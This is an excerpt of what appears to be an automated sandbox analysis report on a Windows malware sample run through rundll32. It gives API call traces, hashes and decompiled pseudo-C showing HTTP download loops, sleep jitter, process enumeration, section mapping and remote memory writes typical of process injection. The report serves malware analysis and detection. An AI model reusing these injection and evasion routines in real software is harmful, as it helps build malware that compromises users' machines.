                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01004368
                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 0100437B
                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 01004397
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 010043B4
                          • memcpy.NTDLL(?,00000000,0000001C), ref: 010043C1
                          • NtClose.NTDLL(?), ref: 010043D3
                          • NtClose.NTDLL(00000000), ref: 010043DD
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                          • String ID:
                          • API String ID: 2575439697-0
                          • Opcode ID: 0ded2d2aee42726f23e14d87d9f141ed84fd8bf0ec44519dd882decb3c5a57de
                          • Instruction ID: 03405c0b8e5e209493c3dd754971a5245cd38c6a65b0c4a8fe6a1a8586332a89
                          • Opcode Fuzzy Hash: 0ded2d2aee42726f23e14d87d9f141ed84fd8bf0ec44519dd882decb3c5a57de
                          • Instruction Fuzzy Hash: 502119B1900119BFEF12EF95DC84ADEBFBDEF08740F108022FA45E6150D7B29A549BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memcpy.NTDLL(?,?,?,05B6C71A,?,?,?,?,?,05B6C71A,?,?,00000000), ref: 05B76F59
                            • Part of subcall function 05B6C4FB: GetModuleHandleA.KERNEL32(?,?,?,05B77017,?,?,?,00000000), ref: 05B6C539
                            • Part of subcall function 05B6C4FB: memcpy.NTDLL(?,05B8A30C,00000018,?,?,?), ref: 05B6C5B5
                          • memcpy.NTDLL(?,?,00000018,05B6C71A,?,?,?,?,?,05B6C71A,?,?,00000000), ref: 05B76FA7
                          • memcpy.NTDLL(?,05B7DD8F,00000800,?,?,?,00000000), ref: 05B7702A
                          • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 05B77068
                          • NtClose.NTDLL(00000000,?,00000000), ref: 05B7708F
                            • Part of subcall function 05B78F62: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,05B6C71A,05B6C71A,?,05B76EFA,?,05B6C71A,?,?,00000000), ref: 05B78F87
                            • Part of subcall function 05B78F62: GetProcAddress.KERNEL32(00000000,?), ref: 05B78FA9
                            • Part of subcall function 05B78F62: GetProcAddress.KERNEL32(00000000,?), ref: 05B78FBF
                            • Part of subcall function 05B78F62: GetProcAddress.KERNEL32(00000000,?), ref: 05B78FD5
                            • Part of subcall function 05B78F62: GetProcAddress.KERNEL32(00000000,?), ref: 05B78FEB
                            • Part of subcall function 05B78F62: GetProcAddress.KERNEL32(00000000,?), ref: 05B79001
                            • Part of subcall function 05B7BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,05B6717E,00000000,00000000,05B6717E,?,00000002,00000000,?,05B6C71A,00000000,05B6717E,000000FF,?), ref: 05B7BEAE
                            • Part of subcall function 05B71CE4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,05B6C71A,?,?,00000000), ref: 05B71D58
                            • Part of subcall function 05B71CE4: memcpy.NTDLL(?,?,?), ref: 05B71DBF
                          • memset.NTDLL ref: 05B770AA
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                          • String ID:
                          • API String ID: 3674896251-0
                          • Opcode ID: 8cc52cc77bcfd06bf7572b1dd55ba32d46aeb718fc68aee84c7827fc02b8a828
                          • Instruction ID: 6fe803619924e8360028c8de2de37168a91fa38dae030392060d503f41a3d0bb
                          • Opcode Fuzzy Hash: 8cc52cc77bcfd06bf7572b1dd55ba32d46aeb718fc68aee84c7827fc02b8a828
                          • Instruction Fuzzy Hash: DFA12E71A0060AEFDF11DFA8C884BAEBBB5FF04304F1445A9E525A7250EB35BA54CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E01001CA5(void* __eax, void* __ecx) {
                          				long _v8;
                          				void* _v12;
                          				void* _v16;
                          				void _v20;
                          				void* __esi;
                          				void* _t30;
                          				void* _t38;
                          				intOrPtr* _t39;
                          				intOrPtr* _t41;
                          				int _t45;
                          				long _t47;
                          				void* _t54;
                          				long _t64;
                          				void* _t67;
                          				void* _t69;
                          
                          				_t58 = __ecx;
                          				_t67 = __eax;
                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                          					L2:
                          					_t30 = _t67;
                          					_pop(_t68);
                          					_t69 = _t30;
                          					_t64 = 0;
                          					ResetEvent( *(_t69 + 0x1c));
                          					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
                          						L9:
                          						if(_v8 == 0) {
                          							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                          						} else {
                          							 *0x100a174(0, 1,  &_v12); // executed
                          							if(0 != 0) {
                          								_t64 = 8;
                          							} else {
                          								_t38 = E01006D63(0x1000);
                          								_v16 = _t38;
                          								if(_t38 == 0) {
                          									_t64 = 8;
                          								} else {
                          									_push(0);
                          									_push(_v8);
                          									_push( &_v20);
                          									while(1) {
                          										_t41 = _v12;
                          										_t61 =  *_t41;
                          										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                          										ResetEvent( *(_t69 + 0x1c));
                          										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
                          										if(_t45 != 0) {
                          											goto L17;
                          										}
                          										_t64 = GetLastError();
                          										if(_t64 == 0x3e5) {
                          											_t64 = E01006E40( *(_t69 + 0x1c), _t61, 0xffffffff);
                          											if(_t64 == 0) {
                          												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                          												if(_t64 == 0) {
                          													goto L17;
                          												}
                          											}
                          										}
                          										L19:
                          										E01006C2C(_v16);
                          										if(_t64 == 0) {
                          											_t47 = E010015CC(_v12, _t69); // executed
                          											_t64 = _t47;
                          										}
                          										goto L22;
                          										L17:
                          										_t64 = 0;
                          										if(_v8 != 0) {
                          											_push(0);
                          											_push(_v8);
                          											_push(_v16);
                          											continue;
                          										}
                          										goto L19;
                          									}
                          								}
                          								L22:
                          								_t39 = _v12;
                          								 *((intOrPtr*)( *_t39 + 8))(_t39);
                          							}
                          						}
                          					} else {
                          						_t64 = GetLastError();
                          						if(_t64 != 0x3e5) {
                          							L8:
                          							if(_t64 == 0) {
                          								goto L9;
                          							}
                          						} else {
                          							_t64 = E01006E40( *(_t69 + 0x1c), _t58, 0xffffffff);
                          							if(_t64 == 0) {
                          								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                          								goto L8;
                          							}
                          						}
                          					}
                          					return _t64;
                          				} else {
                          					_t54 = E01004A85(__ecx, __eax);
                          					if(_t54 != 0) {
                          						return _t54;
                          					} else {
                          						goto L2;
                          					}
                          				}
                          			}

                          APIs
                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,76CC81D0,00000000,00000000), ref: 0100739C
                          • InternetReadFile.WININET(?,?,00000004,?), ref: 010073AB
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?,?), ref: 010073B5
                          • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?), ref: 0100742E
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 0100743F
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?,?), ref: 01007449
                            • Part of subcall function 01004A85: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 01004A9C
                            • Part of subcall function 01004A85: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?), ref: 01004AAC
                            • Part of subcall function 01004A85: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 01004ADE
                            • Part of subcall function 01004A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01004B03
                            • Part of subcall function 01004A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01004B23
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                          • String ID:
                          • API String ID: 2393427839-0
                          • Opcode ID: 8c1ff984e928f03a03c0c4684d3e72aa7c985d95a8510f41feba855bdeb02d91
                          • Instruction ID: 39b954f629afeba9bf86f0d4c3b9ab6e084f1fc50282359a740cebc1e56002be
                          • Opcode Fuzzy Hash: 8c1ff984e928f03a03c0c4684d3e72aa7c985d95a8510f41feba855bdeb02d91
                          • Instruction Fuzzy Hash: 71410831600204BFEB639BA8CC40A9E7BFAAF84360F124564E5C5D71D0DF34F8018B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05B7235C
                          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05B72369
                          • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05B723F5
                          • GetModuleHandleA.KERNEL32(00000000), ref: 05B72400
                          • RtlImageNtHeader.NTDLL(00000000), ref: 05B72409
                          • RtlExitUserThread.NTDLL(00000000), ref: 05B7241E
                            • Part of subcall function 05B70818: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05B72397,?), ref: 05B70820
                            • Part of subcall function 05B70818: GetVersion.KERNEL32 ref: 05B7082F
                            • Part of subcall function 05B70818: GetCurrentProcessId.KERNEL32 ref: 05B7084B
                            • Part of subcall function 05B70818: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05B70868
                            • Part of subcall function 05B6C7B6: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 05B6C815
                            • Part of subcall function 05B6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05B67D5E), ref: 05B6A6BE
                            • Part of subcall function 05B7212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,05B6111D,00000000), ref: 05B7214D
                            • Part of subcall function 05B7212C: GetProcAddress.KERNEL32(00000000,?), ref: 05B72166
                            • Part of subcall function 05B7212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,05B6111D,00000000), ref: 05B72183
                            • Part of subcall function 05B7212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,05B6111D,00000000), ref: 05B72194
                            • Part of subcall function 05B7212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,05B6111D,00000000), ref: 05B721A7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                          • String ID:
                          • API String ID: 2581485877-0
                          • Opcode ID: f79e11014cbaa9fee03230947e24bc0615c40cacc96660ddbd5cdd5dd61b904e
                          • Instruction ID: 3adb19b545cda2376eaa759e8581dbfdcf5d164a51317dc971f732f45e499804
                          • Opcode Fuzzy Hash: f79e11014cbaa9fee03230947e24bc0615c40cacc96660ddbd5cdd5dd61b904e
                          • Instruction Fuzzy Hash: A0319135A00118AFCB22EF74DC89E7DBBA5FB45750F6141A9F626E7240DB34B944CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			E01004B89(void* __ecx, intOrPtr _a4) {
                          				struct _FILETIME _v12;
                          				int _t13;
                          				signed int _t16;
                          				void* _t18;
                          				signed int _t19;
                          				unsigned int _t23;
                          				void* _t30;
                          				signed int _t34;
                          
                          				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                          				asm("stosd");
                          				do {
                          					_t13 = SwitchToThread();
                          					GetSystemTimeAsFileTime( &_v12);
                          					_t23 = _v12.dwHighDateTime;
                          					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                          					_push(0);
                          					_push(0x13);
                          					_push(_t23 >> 5);
                          					_push(_t16);
                          					L010083A6();
                          					_t34 = _t16 + _t13;
                          					_t18 = E01005D2E(_a4, _t34);
                          					_t30 = _t18;
                          					_t19 = 3;
                          					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                          				} while (_t30 == 1);
                          				return _t30;
                          			}

                          APIs
                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,01001D14,?,?), ref: 01004B9A
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,01001D14,?,?), ref: 01004BA6
                          • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 01004BBF
                            • Part of subcall function 01005D2E: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 01005D8D
                          • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,01001D14,?,?), ref: 01004BDE
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                          • String ID:
                          • API String ID: 1610602887-0
                          • Opcode ID: c3fa2b5c4721efede2473b42c3d2e7711be02bcf5136634b7847f3070bea798d
                          • Instruction ID: 1f57333589efbce4efda07b751a7e412ed06621fec8a31cea2370b2c038e3f38
                          • Opcode Fuzzy Hash: c3fa2b5c4721efede2473b42c3d2e7711be02bcf5136634b7847f3070bea798d
                          • Instruction Fuzzy Hash: E9F0A477A002087BE7159BA4CC1EFDE77BDDB84355F040125F605E7280E6789A008750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E010068BD() {
                          				char _v264;
                          				void* _v300;
                          				void* _t5;
                          				int _t8;
                          				intOrPtr _t9;
                          				int _t15;
                          				void* _t17;
                          
                          				_t15 = 0;
                          				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                          				_t17 = _t5;
                          				if(_t17 != 0) {
                          					_t8 = Process32First(_t17,  &_v300);
                          					while(_t8 != 0) {
                          						_t9 =  *0x100a348; // 0x428d5a8
                          						_t2 = _t9 + 0x100beb0; // 0x73617661
                          						_push( &_v264);
                          						if( *0x100a12c() != 0) {
                          							_t15 = 1;
                          						} else {
                          							_t8 = Process32Next(_t17,  &_v300);
                          							continue;
                          						}
                          						L7:
                          						FindCloseChangeNotification(_t17); // executed
                          						goto L8;
                          					}
                          					goto L7;
                          				}
                          				L8:
                          				return _t15;
                          			}

                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 010068CD
                          • Process32First.KERNEL32(00000000,?), ref: 010068E0
                          • Process32Next.KERNEL32(00000000,?), ref: 0100690C
                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 0100691B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                          • String ID:
                          • API String ID: 3243318325-0
                          • Opcode ID: eb8bddaac3157d429416eb20752e259b67291033c586acff8049aeca2fc658cf
                          • Instruction ID: 1bb67df8f07172ffb19dcccc9157ee9c90a1c707c0d32092155faaa0d2258082
                          • Opcode Fuzzy Hash: eb8bddaac3157d429416eb20752e259b67291033c586acff8049aeca2fc658cf
                          • Instruction Fuzzy Hash: 09F0B1711011196AF733A7768C48EEF37ADDBC5314F000161FAC5D7040EB35DA658761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 05B67167
                            • Part of subcall function 05B7BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,05B6717E,00000000,00000000,05B6717E,?,00000002,00000000,?,05B6C71A,00000000,05B6717E,000000FF,?), ref: 05B7BEAE
                          • memset.NTDLL ref: 05B6718B
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Section$CreateViewmemset
                          • String ID: @
                          • API String ID: 2533685722-2766056989
                          • Opcode ID: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                          • Instruction ID: 41c39cf4ab4b8cf37afe9f021df0e849cc524208c07b7af40c0223e29e96add5
                          • Opcode Fuzzy Hash: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                          • Instruction Fuzzy Hash: 8621FCB5D0020DAFDB11DFA9C8849EEFBB9FF48354F20456AE616F3250D634AA458B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetProcAddress.KERNEL32(?,00000318), ref: 05B761D3
                          • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 05B761EF
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                            • Part of subcall function 05B7A806: GetProcAddress.KERNEL32(?,00000000), ref: 05B7A82F
                            • Part of subcall function 05B7A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05B76230,00000000,00000000,00000028,00000100), ref: 05B7A851
                          • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05B76359
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                          • String ID:
                          • API String ID: 3547194813-0
                          • Opcode ID: b81308a481570d492fd416c6133e04ab0a19bb9c415fd9b22f8d9c8a8751bc86
                          • Instruction ID: 0c0ab38332411b7fead89b49bf0002d6b3175f251815c4f1c59f21280e80bedd
                          • Opcode Fuzzy Hash: b81308a481570d492fd416c6133e04ab0a19bb9c415fd9b22f8d9c8a8751bc86
                          • Instruction Fuzzy Hash: 9D612071A0460AAFDF15DF98C980BEEBBB5FF08300F114599E915A7241D770F954CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B70796
                          • GetProcAddress.KERNEL32(?), ref: 05B707BE
                          • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 05B707DC
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressInformationProcProcess64QueryWow64memset
                          • String ID:
                          • API String ID: 2968673968-0
                          • Opcode ID: b9293f5b447be1796c1e44af937af93feb3a76ef6e486bc7d99cc5192819ec30
                          • Instruction ID: 7f5f9c6a1cc4a9a8d3c7961b7b0beb20bd9ead3cb32bec35c2d2d4894a1aa583
                          • Opcode Fuzzy Hash: b9293f5b447be1796c1e44af937af93feb3a76ef6e486bc7d99cc5192819ec30
                          • Instruction Fuzzy Hash: 7C119E35A1021DAFDB10EB94DC49FAA7BA9EB45700F04406AF914EB280EB70F905CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtAllocateVirtualMemory.NTDLL(05B7EB0F,00000000,00000000,05B7EB0F,00003000,00000040), ref: 05B77981
                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 05B77988
                          • SetLastError.KERNEL32(00000000), ref: 05B7798F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$AllocateLastMemoryStatusVirtual
                          • String ID:
                          • API String ID: 722216270-0
                          • Opcode ID: bf5495a1cc6d4379ca320fab77688613bb09bafa049d563fe9cc415c4a644ceb
                          • Instruction ID: 5ffcfd69798215bec0691c21529f5438289baf5718d55d9552c70ac4da756df1
                          • Opcode Fuzzy Hash: bf5495a1cc6d4379ca320fab77688613bb09bafa049d563fe9cc415c4a644ceb
                          • Instruction Fuzzy Hash: 00F0FEB1521309FBEB05DB94D90AFBE7BBCEB44355F104048B601A6180EFB4BB04DB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,05B7907F,?,00000004,00000000,00000004,?), ref: 05B75330
                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 05B7533F
                          • SetLastError.KERNEL32(00000000,?,05B7907F,?,00000004,00000000,00000004,?,?,?,?,05B6C691,?,00000000,CCCCFEEB,?), ref: 05B75346
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$LastMemoryStatusVirtualWrite
                          • String ID:
                          • API String ID: 1089604434-0
                          • Opcode ID: 6c8050b95decf359839cda9df7570365f659b066db97a13e487b06beba708df2
                          • Instruction ID: 9b4b42acc54b88132a484ed550de0d9ec7369079d6e07e1d645acd74766fd3f7
                          • Opcode Fuzzy Hash: 6c8050b95decf359839cda9df7570365f659b066db97a13e487b06beba708df2
                          • Instruction Fuzzy Hash: 04E09A3621421EBBCF215EE8AC05DEE7F6AFB08651B015015BE16D3160DA71F861EBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E0100190C(intOrPtr* __eax, void** _a4) {
                          				int _v12;
                          				void* _v16;
                          				void* _v20;
                          				void* _v24;
                          				int _v28;
                          				int _v32;
                          				intOrPtr _v36;
                          				int _v40;
                          				int _v44;
                          				void* _v48;
                          				void* __esi;
                          				long _t34;
                          				void* _t39;
                          				void* _t47;
                          				intOrPtr* _t48;
                          
                          				_t48 = __eax;
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				_v24 =  *((intOrPtr*)(__eax + 4));
                          				_v16 = 0;
                          				_v12 = 0;
                          				_v48 = 0x18;
                          				_v44 = 0;
                          				_v36 = 0x40;
                          				_v40 = 0;
                          				_v32 = 0;
                          				_v28 = 0;
                          				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                          				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34); // failure: indirect call through the context's +0x18 slot with the NTSTATUS (the slot E01006D0A uses as __esi[6])
                          				} else {
					 *_t48 = _v16;                  // context+0: section handle, consumed by E01006D0A
					_t39 = E01006D0A(_t48,  &_v12); // executed: maps the section into this process, base returned in _v12
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16); // mapping failed: context's +0x1c routine gets the section handle (cleanup, presumably a close)
					} else {
						memset(_v12, 0, _v24);      // zero the whole view (MaximumSize bytes)
						 *_a4 = _v12;               // hand the mapped base back to the caller
					}
                          					}
                          				}
                          				return _t47;
                          			}

                          0x01001915
                          0x0100191c
                          0x0100191d
                          0x0100191e
                          0x0100191f
                          0x01001920
                          0x01001931
                          0x01001935
                          0x01001949
                          0x0100194c
                          0x0100194f
                          0x01001956
                          0x01001959
                          0x01001960
                          0x01001963
                          0x01001966
                          0x01001969
                          0x0100196e
                          0x010019a9
                          0x01001970
                          0x01001973
                          0x01001979
                          0x0100197e
                          0x01001982
                          0x010019a0
                          0x01001984
                          0x0100198b
                          0x01001999
                          0x01001999
                          0x01001982
                          0x010019b1

                          APIs
                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,0100459D), ref: 01001969
                            • Part of subcall function 01006D0A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0100197E,00000002,00000000,?,?,00000000,?,?,0100197E,00000000), ref: 01006D37
                          • memset.NTDLL ref: 0100198B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Section$CreateViewmemset
                          • String ID:
                          • API String ID: 2533685722-0
                          • Opcode ID: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                          • Instruction ID: 4be870be015fbb065f88db215cbf778b225fa1cbf32ba3e649a7b7e17bd5b64f
                          • Opcode Fuzzy Hash: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                          • Instruction Fuzzy Hash: AE211DB1D00209AFDB11DFA9C8849EEFBF9EF48354F504469E646F3250D7319A488BA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetProcAddress.KERNEL32(?,00000000), ref: 05B7A82F
                          • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05B76230,00000000,00000000,00000028,00000100), ref: 05B7A851
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressMemory64ProcReadVirtualWow64
                          • String ID:
                          • API String ID: 752694512-0
                          • Opcode ID: 7573af034db79d837237ef3f1a053b36d025caf1f577ab670f4e6e78f55ee67b
                          • Instruction ID: e4d1545ae26a7bd3f08d9eee6ce6cd2a3567e1157270ee762db7af2a0de1a18f
                          • Opcode Fuzzy Hash: 7573af034db79d837237ef3f1a053b36d025caf1f577ab670f4e6e78f55ee67b
                          • Instruction Fuzzy Hash: B5F04976510108FFCB119F89DC45CAEBFBAFB89710B24405AF914C7220E631B952DB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
